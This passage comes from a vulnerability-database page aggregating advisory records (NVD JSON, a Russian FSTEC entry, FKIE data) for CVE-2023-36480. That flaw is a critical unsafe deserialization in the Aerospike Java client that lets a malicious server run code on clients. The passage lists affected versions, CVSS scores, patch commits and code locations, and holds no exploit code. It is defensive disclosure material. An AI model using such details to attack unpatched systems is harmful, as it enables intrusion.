            "operator": "OR"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "security-advisories@github.com",
          "ID": "CVE-2023-36480"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "The Aerospike Java client is a Java application that implements a network protocol to communicate with an Aerospike server. Prior to versions 7.0.0, 6.2.0, 5.2.0, and 4.5.0 some of the messages received from the server contain Java objects that the client deserializes when it encounters them without further validation. Attackers that manage to trick clients into communicating with a malicious server can include especially crafted objects in its responses that, once deserialized by the client, force it to execute arbitrary code. This can be abused to take control of the machine the client is running on. Versions 7.0.0, 6.2.0, 5.2.0, and 4.5.0 contain a patch for this issue."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-502"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://github.com/aerospike/aerospike-client-java/security/advisories/GHSA-jj95-55cr-9597",
              "refsource": "MISC",
              "tags": [
                "Vendor Advisory"
              ],
              "url": "https://github.com/aerospike/aerospike-client-java/security/advisories/GHSA-jj95-55cr-9597"
            },
            {
              "name": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L596",
              "refsource": "MISC",
              "tags": [
                "Product"
              ],
              "url": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L596"
            },
            {
              "name": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Command.java#L2083",
              "refsource": "MISC",
              "tags": [
                "Product"
              ],
              "url": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Command.java#L2083"
            },
            {
              "name": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/AsyncRead.java#L68",
              "refsource": "MISC",
              "tags": [
                "Product"
              ],
              "url": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/AsyncRead.java#L68"
            },
            {
              "name": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/util/Unpacker.java#L227",
              "refsource": "MISC",
              "tags": [
                "Product"
              ],
              "url": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/util/Unpacker.java#L227"
            },
            {
              "name": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L1157",
              "refsource": "MISC",
              "tags": [
                "Product"
              ],
              "url": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L1157"
            },
            {
              "name": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L489",
              "refsource": "MISC",
              "tags": [
                "Product"
              ],
              "url": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L489"
            },
            {
              "name": "https://github.com/aerospike/aerospike-client-java/commit/80c508cc5ecb0173ce92d7fab8cfab5e77bd9900",
              "refsource": "MISC",
              "tags": [
                "Patch"
              ],
              "url": "https://github.com/aerospike/aerospike-client-java/commit/80c508cc5ecb0173ce92d7fab8cfab5e77bd9900"
            },
            {
              "name": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Buffer.java#L53",
              "refsource": "MISC",
              "tags": [
                "Product"
              ],
              "url": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Buffer.java#L53"
            },
            {
              "name": "https://support.aerospike.com/s/article/CVE-2023-36480-Aerospike-Java-Client-vulnerable-to-unsafe-deserialization-of-server-responses",
              "refsource": "MISC",
              "tags": [
                "Vendor Advisory"
              ],
              "url": "https://support.aerospike.com/s/article/CVE-2023-36480-Aerospike-Java-Client-vulnerable-to-unsafe-deserialization-of-server-responses"
            },
            {
              "name": "https://github.com/aerospike/aerospike-client-java/commit/51c65e32837da29435161a2d9c09bbdc2071ecae",
              "refsource": "MISC",
              "tags": [
                "Patch"
              ],
              "url": "https://github.com/aerospike/aerospike-client-java/commit/51c65e32837da29435161a2d9c09bbdc2071ecae"
            },
            {
              "name": "https://github.com/aerospike/aerospike-client-java/commit/02bf28e62fb186f004c82c87b219db2fc5b8262a",
              "refsource": "MISC",
              "tags": [
                "Patch"
              ],
              "url": "https://github.com/aerospike/aerospike-client-java/commit/02bf28e62fb186f004c82c87b219db2fc5b8262a"
            },
            {
              "name": "https://github.com/aerospike/aerospike-client-java/commit/66aafb4cd743cf53baffaeaf69b035f51d2e2e36",
              "refsource": "MISC",
              "tags": [
                "Patch"
              ],
              "url": "https://github.com/aerospike/aerospike-client-java/commit/66aafb4cd743cf53baffaeaf69b035f51d2e2e36"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV3": {
          "cvssV3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      },
      "lastModifiedDate": "2023-08-09T17:36Z",
      "publishedDate": "2023-08-04T15:15Z"
    }
  }
}

CVE-2023-36480

Vulnerability from fstec - Published: 08.08.2023

Title

Уязвимость Java-клиента системы управления базами данных Aerospike Database, позволяющая нарушителю выполнить произвольный код

Description

Уязвимость Java-клиента системы управления базами данных Aerospike Database связана с недостатками механизма десериализации. Эксплуатация уязвимости может позволить нарушителю, действующему удаленно, выполнить произвольный код

Severity ?


                    
                      AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Vendor

Aerospike Inc.

Software Name

Aerospike Database

Software Version

до 4.5.0 (Aerospike Database), от 5.0.0 до 5.2.0 (Aerospike Database), от 6.0.0 до 6.2.0 (Aerospike Database)

Possible Mitigations

Использование рекомендаций: https://support.aerospike.com/s/article/CVE-2023-36480-Aerospike-Java-Client-vulnerable-to-unsafe-deserialization-of-server-responses

Reference

https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/AsyncRead.java#L68 https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L1157 https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L489 https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L596 https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Buffer.java#L53 https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Command.java#L2083 https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/util/Unpacker.java#L227 https://github.com/aerospike/aerospike-client-java/commit/02bf28e62fb186f004c82c87b219db2fc5b8262a https://github.com/aerospike/aerospike-client-java/commit/51c65e32837da29435161a2d9c09bbdc2071ecae https://github.com/aerospike/aerospike-client-java/commit/66aafb4cd743cf53baffaeaf69b035f51d2e2e36 https://github.com/aerospike/aerospike-client-java/commit/80c508cc5ecb0173ce92d7fab8cfab5e77bd9900 https://github.com/aerospike/aerospike-client-java/security/advisories/GHSA-jj95-55cr-9597 https://support.aerospike.com/s/article/CVE-2023-36480-Aerospike-Java-Client-vulnerable-to-unsafe-deserialization-of-server-responses

CWE

CWE-502

JSON

To clipboard

{
  "CVSS 2.0": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
  "CVSS 3.0": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  "CVSS 4.0": null,
  "remediation_\u0418\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440": null,
  "remediation_\u041d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435": null,
  "\u0412\u0435\u043d\u0434\u043e\u0440 \u041f\u041e": "Aerospike Inc.",
  "\u0412\u0435\u0440\u0441\u0438\u044f \u041f\u041e": "\u0434\u043e 4.5.0 (Aerospike Database), \u043e\u0442 5.0.0 \u0434\u043e 5.2.0 (Aerospike Database), \u043e\u0442 6.0.0 \u0434\u043e 6.2.0 (Aerospike Database)",
  "\u0412\u043e\u0437\u043c\u043e\u0436\u043d\u044b\u0435 \u043c\u0435\u0440\u044b \u043f\u043e \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044e": "\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0439: \nhttps://support.aerospike.com/s/article/CVE-2023-36480-Aerospike-Java-Client-vulnerable-to-unsafe-deserialization-of-server-responses",
  "\u0414\u0430\u0442\u0430 \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0438\u044f": "08.08.2023",
  "\u0414\u0430\u0442\u0430 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0433\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f": "11.08.2023",
  "\u0414\u0430\u0442\u0430 \u043f\u0443\u0431\u043b\u0438\u043a\u0430\u0446\u0438\u0438": "11.08.2023",
  "\u0418\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440": "BDU:2023-04601",
  "\u0418\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440\u044b \u0434\u0440\u0443\u0433\u0438\u0445 \u0441\u0438\u0441\u0442\u0435\u043c \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "CVE-2023-36480",
  "\u0418\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u043e\u0431 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u0438": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0430",
  "\u041a\u043b\u0430\u0441\u0441 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043a\u043e\u0434\u0430",
  "\u041d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 \u041f\u041e": "Aerospike Database",
  "\u041d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435 \u041e\u0421 \u0438 \u0442\u0438\u043f \u0430\u043f\u043f\u0430\u0440\u0430\u0442\u043d\u043e\u0439 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u044b": null,
  "\u041d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Java-\u043a\u043b\u0438\u0435\u043d\u0442\u0430 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0431\u0430\u0437\u0430\u043c\u0438 \u0434\u0430\u043d\u043d\u044b\u0445 Aerospike Database, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u043d\u0430\u0440\u0443\u0448\u0438\u0442\u0435\u043b\u044e \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434",
  "\u041d\u0430\u043b\u0438\u0447\u0438\u0435 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430": "\u0414\u0430\u043d\u043d\u044b\u0435 \u0443\u0442\u043e\u0447\u043d\u044f\u044e\u0442\u0441\u044f",
  "\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u043e\u0448\u0438\u0431\u043a\u0438 CWE": "\u0412\u043e\u0441\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0432 \u043f\u0430\u043c\u044f\u0442\u0438 \u043d\u0435\u0434\u043e\u0441\u0442\u043e\u0432\u0435\u0440\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 (CWE-502)",
  "\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Java-\u043a\u043b\u0438\u0435\u043d\u0442\u0430 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0431\u0430\u0437\u0430\u043c\u0438 \u0434\u0430\u043d\u043d\u044b\u0445 Aerospike Database \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043a\u0430\u043c\u0438 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u0430 \u0434\u0435\u0441\u0435\u0440\u0438\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438. \u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442\u044c \u043d\u0430\u0440\u0443\u0448\u0438\u0442\u0435\u043b\u044e, \u0434\u0435\u0439\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u043c\u0443 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e, \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434",
  "\u041f\u043e\u0441\u043b\u0435\u0434\u0441\u0442\u0432\u0438\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": null,
  "\u041f\u0440\u043e\u0447\u0430\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f": null,
  "\u0421\u0432\u044f\u0437\u044c \u0441 \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u0430\u043c\u0438 \u0418\u0411": "\u0414\u0430\u043d\u043d\u044b\u0435 \u0443\u0442\u043e\u0447\u043d\u044f\u044e\u0442\u0441\u044f",
  "\u0421\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u041e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u0430",
  "\u0421\u043f\u043e\u0441\u043e\u0431 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f": "\u041e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f",
  "\u0421\u043f\u043e\u0441\u043e\u0431 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438": "\u041c\u0430\u043d\u0438\u043f\u0443\u043b\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0430\u043c\u0438 \u0434\u0430\u043d\u043d\u044b\u0445",
  "\u0421\u0441\u044b\u043b\u043a\u0438 \u043d\u0430 \u0438\u0441\u0442\u043e\u0447\u043d\u0438\u043a\u0438": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/AsyncRead.java#L68\nhttps://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L1157\nhttps://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L489\nhttps://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L596\nhttps://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Buffer.java#L53\nhttps://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Command.java#L2083\nhttps://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/util/Unpacker.java#L227\nhttps://github.com/aerospike/aerospike-client-java/commit/02bf28e62fb186f004c82c87b219db2fc5b8262a\nhttps://github.com/aerospike/aerospike-client-java/commit/51c65e32837da29435161a2d9c09bbdc2071ecae\nhttps://github.com/aerospike/aerospike-client-java/commit/66aafb4cd743cf53baffaeaf69b035f51d2e2e36\nhttps://github.com/aerospike/aerospike-client-java/commit/80c508cc5ecb0173ce92d7fab8cfab5e77bd9900\nhttps://github.com/aerospike/aerospike-client-java/security/advisories/GHSA-jj95-55cr-9597\nhttps://support.aerospike.com/s/article/CVE-2023-36480-Aerospike-Java-Client-vulnerable-to-unsafe-deserialization-of-server-responses",
  "\u0421\u0442\u0430\u0442\u0443\u0441 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u041f\u043e\u0434\u0442\u0432\u0435\u0440\u0436\u0434\u0435\u043d\u0430 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0438\u0442\u0435\u043b\u0435\u043c",
  "\u0422\u0438\u043f \u041f\u041e": "\u0421\u0423\u0411\u0414",
  "\u0422\u0438\u043f \u043e\u0448\u0438\u0431\u043a\u0438 CWE": "CWE-502",
  "\u0423\u0440\u043e\u0432\u0435\u043d\u044c \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u041a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u0443\u0440\u043e\u0432\u0435\u043d\u044c \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 (\u0431\u0430\u0437\u043e\u0432\u0430\u044f \u043e\u0446\u0435\u043d\u043a\u0430 CVSS 2.0 \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 10)\n\u041a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u0443\u0440\u043e\u0432\u0435\u043d\u044c \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 (\u0431\u0430\u0437\u043e\u0432\u0430\u044f \u043e\u0446\u0435\u043d\u043a\u0430 CVSS 3.0 \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 9,8)"
}

FKIE_CVE-2023-36480

Vulnerability from fkie_nvd - Published: 2023-08-04 15:15 - Updated: 2024-11-21 08:09

Severity ?

9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/AsyncRead.java#L68	Product
security-advisories@github.com	https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L1157	Product
security-advisories@github.com	https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L489	Product
security-advisories@github.com	https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L596	Product
security-advisories@github.com	https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Buffer.java#L53	Product
security-advisories@github.com	https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Command.java#L2083	Product
security-advisories@github.com	https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/util/Unpacker.java#L227	Product
security-advisories@github.com	https://github.com/aerospike/aerospike-client-java/commit/02bf28e62fb186f004c82c87b219db2fc5b8262a	Patch
security-advisories@github.com	https://github.com/aerospike/aerospike-client-java/commit/51c65e32837da29435161a2d9c09bbdc2071ecae	Patch
security-advisories@github.com	https://github.com/aerospike/aerospike-client-java/commit/66aafb4cd743cf53baffaeaf69b035f51d2e2e36	Patch
security-advisories@github.com	https://github.com/aerospike/aerospike-client-java/commit/80c508cc5ecb0173ce92d7fab8cfab5e77bd9900	Patch
security-advisories@github.com	https://github.com/aerospike/aerospike-client-java/security/advisories/GHSA-jj95-55cr-9597	Vendor Advisory
security-advisories@github.com	https://support.aerospike.com/s/article/CVE-2023-36480-Aerospike-Java-Client-vulnerable-to-unsafe-deserialization-of-server-responses	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/AsyncRead.java#L68	Product
af854a3a-2127-422b-91ae-364da2661108	https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L1157	Product
af854a3a-2127-422b-91ae-364da2661108	https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L489	Product
af854a3a-2127-422b-91ae-364da2661108	https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L596	Product
af854a3a-2127-422b-91ae-364da2661108	https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Buffer.java#L53	Product
af854a3a-2127-422b-91ae-364da2661108	https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Command.java#L2083	Product
af854a3a-2127-422b-91ae-364da2661108	https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/util/Unpacker.java#L227	Product
af854a3a-2127-422b-91ae-364da2661108	https://github.com/aerospike/aerospike-client-java/commit/02bf28e62fb186f004c82c87b219db2fc5b8262a	Patch
af854a3a-2127-422b-91ae-364da2661108	https://github.com/aerospike/aerospike-client-java/commit/51c65e32837da29435161a2d9c09bbdc2071ecae	Patch
af854a3a-2127-422b-91ae-364da2661108	https://github.com/aerospike/aerospike-client-java/commit/66aafb4cd743cf53baffaeaf69b035f51d2e2e36	Patch
af854a3a-2127-422b-91ae-364da2661108	https://github.com/aerospike/aerospike-client-java/commit/80c508cc5ecb0173ce92d7fab8cfab5e77bd9900	Patch
af854a3a-2127-422b-91ae-364da2661108	https://github.com/aerospike/aerospike-client-java/security/advisories/GHSA-jj95-55cr-9597	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://support.aerospike.com/s/article/CVE-2023-36480-Aerospike-Java-Client-vulnerable-to-unsafe-deserialization-of-server-responses	Vendor Advisory

Impacted products

Vendor	Product	Version
aerospike	aerospike_java_client	*
aerospike	aerospike_java_client	*
aerospike	aerospike_java_client	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:aerospike:aerospike_java_client:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "8AF2204F-28DD-49CC-8468-CDB842A26AD6",
              "versionEndExcluding": "4.5.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:aerospike:aerospike_java_client:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "8DC4192F-9ADB-4642-8CA0-B2DE4FCCC38D",
              "versionEndExcluding": "5.2.0",
              "versionStartIncluding": "5.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:aerospike:aerospike_java_client:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "C73DE084-C94F-4498-88B2-9D860736FFEC",
              "versionEndExcluding": "6.2.0",
              "versionStartIncluding": "6.0.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "The Aerospike Java client is a Java application that implements a network protocol to communicate with an Aerospike server. Prior to versions 7.0.0, 6.2.0, 5.2.0, and 4.5.0 some of the messages received from the server contain Java objects that the client deserializes when it encounters them without further validation. Attackers that manage to trick clients into communicating with a malicious server can include especially crafted objects in its responses that, once deserialized by the client, force it to execute arbitrary code. This can be abused to take control of the machine the client is running on. Versions 7.0.0, 6.2.0, 5.2.0, and 4.5.0 contain a patch for this issue."
    },
    {
      "lang": "es",
      "value": "El cliente Java de Aerospike es una aplicaci\u00f3n Java que implementa un protocolo de red para comunicarse con un servidor Aerospike. Antes de las versiones 7.0.0, 6.2.0, 5.2.0 y 4.5.0, algunos de los mensajes recibidos del servidor conten\u00edan objetos Java que el cliente deserializaba cuando los encontraba sin validaci\u00f3n adicional. Los atacantes que consiguen enga\u00f1ar a los clientes para que se comuniquen con un servidor malicioso pueden incluir objetos especialmente dise\u00f1ados en sus respuestas que, una vez deserializados por el cliente, le obligan a ejecutar c\u00f3digo arbitrario. Esto se puede aprovechar para tomar el control de la m\u00e1quina en la que se ejecuta el cliente. Las versiones 7.0.0, 6.2.0, 5.2.0 y 4.5.0 contienen un parche para este problema."
    }
  ],
  "id": "CVE-2023-36480",
  "lastModified": "2024-11-21T08:09:47.973",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.8,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.9,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.8,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2023-08-04T15:15:10.210",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Product"
      ],
      "url": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/AsyncRead.java#L68"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Product"
      ],
      "url": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L1157"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Product"
      ],
